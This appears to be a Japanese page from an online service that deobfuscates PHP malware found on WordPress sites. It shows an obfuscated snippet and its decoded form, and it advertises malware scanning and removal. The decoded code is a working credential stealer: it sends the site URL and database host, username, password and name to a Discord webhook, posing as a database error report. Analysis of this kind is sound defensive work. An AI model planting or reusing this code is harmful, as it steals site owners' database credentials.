PHP 難読化コードの復元・デコード

Wordpress　等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $siteurl=base64_decode('aHR0cDovLw==').$_SERVER[base64_decode('SFRUUF9IT1NU')].$_SERVER[base64_decode('UEhQX1NFTEY=')];$webhookurl=base64_decode('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTE3NTExMzg5MzYyNzAzOTgwNC84anZrWXQ2UGtRY3ZtX1hvdXlSeW9mVG5mX2Vyd0ViQUVOZGNrR1N2ZE9ZQnVFR3d5SnBYRUxOU...

難読化されたPHPコード

<?php $siteurl=base64_decode('aHR0cDovLw==').$_SERVER[base64_decode('SFRUUF9IT1NU')].$_SERVER[base64_decode('UEhQX1NFTEY=')];$webhookurl=base64_decode('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTE3NTExMzg5MzYyNzAzOTgwNC84anZrWXQ2UGtRY3ZtX1hvdXlSeW9mVG5mX2Vyd0ViQUVOZGNrR1N2ZE9ZQnVFR3d5SnBYRUxOUjZ2WDJwM0RsNzExbQ==');$timestamp=date(base64_decode('Yw=='),strtotime(base64_decode('bm93')));$json_data=json_encode([base64_decode('dXNlcm5hbWU=')=>base64_decode('U1FMIERC'),base64_decode('dHRz')=>false,base64_decode('ZW1iZWRz')=>[[base64_decode('dGl0bGU=')=>base64_decode('REFUQUJBU0UgRVJST1IgU1VQUE9SVA=='),base64_decode('dHlwZQ==')=>base64_decode('cmljaA=='),base64_decode('ZGVzY3JpcHRpb24=')=>base64_decode('UmVwb3J0cyBSQkxPWFJJU0UgZGF0YWJhc2UgZXJyb3JzLg=='),base64_decode('dGltZXN0YW1w')=>$timestamp,base64_decode('Y29sb3I=')=>hexdec(base64_decode('MzM2NmZm')),base64_decode('YXV0aG9y')=>[base64_decode('bmFtZQ==')=>base64_decode('UkJMT1hSSVNF'),],base64_decode('ZmllbGRz')=>[[base64_decode('bmFtZQ==')=>base64_decode('VVJMOg=='),base64_decode('dmFsdWU=')=>$siteurl,base64_decode('aW5saW5l')=>false],[base64_decode('bmFtZQ==')=>base64_decode('Uzo='),base64_decode('dmFsdWU=')=>$servername,base64_decode('aW5saW5l')=>true],[base64_decode('bmFtZQ==')=>base64_decode('VTo='),base64_decode('dmFsdWU=')=>$username,base64_decode('aW5saW5l')=>true],[base64_decode('bmFtZQ==')=>base64_decode('UDo='),base64_decode('dmFsdWU=')=>$password,base64_decode('aW5saW5l')=>true],[base64_decode('bmFtZQ==')=>base64_decode('REI6'),base64_decode('dmFsdWU=')=>$dbname,base64_decode('aW5saW5l')=>true],]]]],JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE);$ch=curl_init($webhookurl);curl_setopt($ch,CURLOPT_HTTPHEADER,array(base64_decode('Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9qc29u')));curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$json_data);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$response=curl_exec($ch);curl_close($ch);?>

デコード(難読化解除)されたコード

<?php

$siteurl = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"];
$webhookurl = "https://discord.com/api/webhooks/1175113893627039804/8jvkYt6PkQcvm_XouyRyofTnf_erwEbAENdckGSvdOYBuEGwyJpXELNR6vX2p3Dl711m";
$timestamp = date("c", strtotime("now"));
$json_data = json_encode(["username" => "SQL DB", "tts" => false, "embeds" => [["title" => "DATABASE ERROR SUPPORT", "type" => "rich", "description" => "Reports RBLOXRISE database errors.", "timestamp" => $timestamp, "color" => hexdec("3366ff"), "author" => ["name" => "RBLOXRISE"], "fields" => [["name" => "URL:", "value" => $siteurl, "inline" => false], ["name" => "S:", "value" => $servername, "inline" => true], ["name" => "U:", "value" => $username, "inline" => true], ["name" => "P:", "value" => $password, "inline" => true], ["name" => "DB:", "value" => $dbname, "inline" => true]]]]], "JSON_UNESCAPED_WNISOEW");
$ch = curl_init($webhookurl);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-type: application/json"));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります